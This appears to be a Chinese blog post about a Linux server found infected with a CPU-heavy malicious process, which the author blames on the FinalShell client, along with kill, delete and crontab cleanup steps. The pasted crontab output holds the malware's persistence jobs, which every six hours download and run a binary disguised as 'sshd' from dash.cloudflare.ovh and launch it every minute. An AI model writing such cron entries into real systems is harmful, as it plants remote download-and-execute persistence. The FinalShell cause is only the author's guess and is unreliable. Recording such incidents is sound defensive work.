中病毒了,重装机器吧,不要使用**FinalShell**链接服务器
记录下我这里出现的原因
FinalShell 链接机器后从左侧的cpu占用图看到的,我进入机器执行命令确实如下;
但是用finalShell链接我阿里云/腾讯服务器没有出现,可能是其他服务器的防火墙比较完善;
top查看cpu占用
解决
找到恶意程序的绝对路径
ll /proc/{pid}
删除恶意程序,kill进程
rm -rf /var/tmp/*
kill -9 {pid}
恶意程序过一段时间后, 还是会重新下载到/var/tmp目录, 并运行.发现有恶意的linux定时任务存在, 删除即可!
[root@vm-16-13-centos tmp]# crontab -l
*/5 * * * * flock -xn /tmp/stargate.lock -c '/usr/local/qcloud/stargate/admin/start.sh > /dev/null 2>&1 &'
0 */6 * * * /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/config.json; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/config.json -o config.json'
* * * * * /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'
[root@vm-16-13-centos tmp]# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
0 */6 * * * root /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/config.json; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/config.json -o config.json'
* * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'
Linux Crontab 定时任务
/etc/crontab文件和crontab -e命令区别
原文链接 https://blog.csdn.net/liujinghu/article/details/125288926